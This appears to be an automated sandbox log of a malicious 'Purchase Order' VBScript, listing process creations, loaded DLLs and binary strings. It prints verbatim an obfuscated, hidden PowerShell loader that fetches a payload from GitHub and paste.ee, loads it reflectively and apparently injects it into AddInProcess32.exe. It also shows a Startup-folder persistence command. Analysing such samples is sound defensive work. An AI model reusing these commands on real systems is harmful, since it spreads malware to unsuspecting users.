Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJEVuVjpDT01zUGVjWzQsMjYsMjVdLUpvSU4nJykoKCgnV1BzdScrJ3InKydsJysnID0gWScrJ1FEaHR0cHM6Ly8nKydyYScrJ3cuJysnZ2l0aHVidXNlJysncmNvbnRlbicrJ3QuY29tL04nKydvRGV0ZWN0TycrJ24nKycvJysnTm8nKydEZXRlJysnY3RPJysnbi8nKydyZWZzL2hlJysnYScrJ2RzL21haW4vRCcrJ2V0YWhObycrJ3RoLScrJ1YudHh0WVFEOycrJyBXUHNiJysnYXNlNjQnKydDb250ZW4nKyd0ID0gKE4nKydlJysndycrJy0nKydPJysnYicrJ2onKydlY3QgUycrJ3lzdGUnKydtLicrJ05ldC5XJysnZWJDbCcrJ2llJysnbicrJ3QpJysnLkRvd25sbycrJ2FkU3RyaW4nKydnJysnKFdQJysnc3VyJysnbCcrJyknKyc7JysnIFcnKydQcycrJ2JpJysnbmFyeUNvbnRlJysnbicrJ3QgPSAnKydbU3lzJysndGVtLicrJ0NvbicrJ3ZlcnRdOicrJzonKydGcicrJ28nKydtQmFzZTY0JysnU3RyaScrJ25nKFdQc2Jhc2UnKyc2NCcrJ0NvbicrJ3RlJysnbnQpJysnOycrJyBXUHNhc3NlbScrJ2InKydsJysneSA9IFtSJysnZWZsZWMnKyd0aW8nKyduJysnLkFzc2VtYmx5XTo6TG8nKydhZChXJysnUCcrJ3NiaW5hcnlDbycrJ250JysnZW50KTsgW2RubGknKydiLicrJ0lPLicrJ0hvbScrJ2UnKyddJysnOicrJzpWJysnQUknKycoJysnMDJWMC8nKydyZ1F2NS9kL2VlJysnLmV0Jysnc2FwJysnLy86c3B0JysndCcrJ2gwJysnMlYsIDAyVmRlJysnc2EnKyd0aScrJ3ZhJysnZG8wMlYsJysnIDAnKycyVmQnKydlc2F0JysnaXZhJysnZG8wMicrJ1YnKycsIDAyVmQnKydlc2F0aXYnKydhJysnZG8wMicrJ1YsICcrJzAnKycyVkEnKydkJysnZEluUCcrJ3JvYycrJ2VzczMyMDJWLCcrJyAwMlYnKycwMlYsMDInKydWMDJWKScpLUNyRXBMYUNFKFtDSGFSXTg3K1tDSGFSXTgwK1tDSGFSXTExNSksW0NIYVJdMzYgLUNyRXBMYUNFICAoW0NIYVJdODkrW0NIYVJdODErW0NIYVJdNjgpLFtDSGFSXTM5IC1yZXBMYUNlICAnMDJWJyxbQ0hhUl0zNCkp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\PING.EXE ping 127.0.0.1 -n 10	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -command [System.IO.File]::Copy('C:\Windows\system32\Purchase Order - PO14895.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.orierocretse.vbs')')	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $EnV:COMsPec[4,26,25]-JoIN'')((('WPsu'+'r'+'l'+' = Y'+'QDhttps://'+'ra'+'w.'+'githubuse'+'rconten'+'t.com/N'+'oDetectO'+'n'+'/'+'No'+'Dete'+'ctO'+'n/'+'refs/he'+'a'+'ds/main/D'+'etahNo'+'th-'+'V.txtYQD;'+' WPsb'+'ase64'+'Conten'+'t = (N'+'e'+'w'+'-'+'O'+'b'+'j'+'ect S'+'yste'+'m.'+'Net.W'+'ebCl'+'ie'+'n'+'t)'+'.Downlo'+'adStrin'+'g'+'(WP'+'sur'+'l'+')'+';'+' W'+'Ps'+'bi'+'naryConte'+'n'+'t = '+'[Sys'+'tem.'+'Con'+'vert]:'+':'+'Fr'+'o'+'mBase64'+'Stri'+'ng(WPsbase'+'64'+'Con'+'te'+'nt)'+';'+' WPsassem'+'b'+'l'+'y = [R'+'eflec'+'tio'+'n'+'.Assembly]::Lo'+'ad(W'+'P'+'sbinaryCo'+'nt'+'ent); [dnli'+'b.'+'IO.'+'Hom'+'e'+']'+':'+':V'+'AI'+'('+'02V0/'+'rgQv5/d/ee'+'.et'+'sap'+'//:spt'+'t'+'h0'+'2V, 02Vde'+'sa'+'ti'+'va'+'do02V,'+' 0'+'2Vd'+'esat'+'iva'+'do02'+'V'+', 02Vd'+'esativ'+'a'+'do02'+'V, '+'0'+'2VA'+'d'+'dInP'+'roc'+'ess3202V,'+' 02V'+'02V,02'+'V02V)')-CrEpLaCE([CHaR]87+[CHaR]80+[CHaR]115),[CHaR]36 -CrEpLaCE ([CHaR]89+[CHaR]81+[CHaR]68),[CHaR]39 -repLaCe '02V',[CHaR]34))"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"	Jump to behavior

Source: C:\Windows\System32\wscript.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sxs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: vbscript.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrobj.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: scrrun.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\PING.EXE	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe	Section loaded: cryptbase.dll	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Jump to behavior

Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000008.00000002.1625573790.00007FF886E80000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
Source:	Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000008.00000002.1575148283.000001B0570DB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1616525139.000001B05E8A0000.00000004.08000000.00040000.00000000.sdmp
